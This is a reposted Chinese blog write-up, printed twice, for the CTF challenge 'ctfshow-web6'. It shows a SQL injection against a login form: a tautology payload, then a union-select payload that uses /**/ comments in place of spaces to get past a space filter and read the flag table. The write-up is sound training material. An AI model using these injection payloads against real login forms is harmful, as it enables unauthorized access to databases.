ctfshow-web6 23-10-06 09:02 3651 5970 blog.csdn.net 0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 看到是一个登录框,所以先考虑到是sql注入。 使用通用payload进行测试 username=a' or 1=1#&password=a 1 发现这里出现了 sql inject error 然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题 那么我们可以选择使用/**/代替空格 然后就是正常流程 username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a 1 以上 注:本文转载自blog.csdn.net的Wcbddd的文章"https://blog.csdn.net/HAI_WD/article/details/132132312"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。 复制链接
0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 看到是一个登录框,所以先考虑到是sql注入。 使用通用payload进行测试 username=a' or 1=1#&password=a 1 发现这里出现了 sql inject error 然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题 那么我们可以选择使用/**/代替空格 然后就是正常流程 username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a 1 以上
评论记录:
回复评论: